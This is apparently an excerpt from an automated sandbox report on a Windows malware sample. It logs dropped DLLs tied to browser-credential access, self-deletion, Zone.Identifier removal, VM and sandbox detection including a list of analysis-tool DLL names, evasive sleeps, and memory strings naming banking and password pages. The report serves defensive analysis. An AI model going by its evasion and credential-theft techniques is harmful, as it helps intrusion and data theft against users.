Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_004033B6 push eax; ret 0_2_00403419
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0216030D push ecx; ret 5_2_02160315
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DB010 push edx; ret 12_2_042DB21F
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DA910 push edx; ret 12_2_042DA91B
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: section name: .text entropy: 7.0432856719930195
Source: aarhevh.2.dr Static PE information: section name: .text entropy: 7.0432856719930195
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\aarhevh Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\21AE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe File created: C:\Users\user\AppData\Local\Temp\katA304.tmp Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C9A7.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File created: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\aarhevh Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\aarhevh:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\aarhevh Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\21AE.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: aarhevh, 00000011.00000002.4461497269.000000000060B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, 00000000.00000002.2051697711.00000000004E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKPF{/"
Source: aarhevh, 00000004.00000002.2290240052.00000000005E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKX~
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_007C32E7 rdtsc 5_2_007C32E7
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 402 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2081 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 819 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 360 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2587 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 873 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 874 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6472 Thread sleep count: 402 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep count: 2081 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep time: -208100s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 1412 Thread sleep count: 819 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1412 Thread sleep time: -81900s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6972 Thread sleep count: 257 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7152 Thread sleep count: 342 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7152 Thread sleep time: -34200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6596 Thread sleep count: 360 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6596 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep count: 2587 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep time: -258700s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe TID: 2624 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3848 Thread sleep count: 66 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\aarhevh Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FEBF0 PR_GetNumberOfProcessors,GetSystemInfo, 13_2_6C9FEBF0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: JEBKEH.13.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: JEBKEH.13.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.000000000091E000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: JEBKEH.13.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: JEBKEH.13.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: JEBKEH.13.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: JEBKEH.13.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: JEBKEH.13.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: JEBKEH.13.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: JEBKEH.13.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware\Pr
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2037994793.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: JEBKEH.13.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: JEBKEH.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
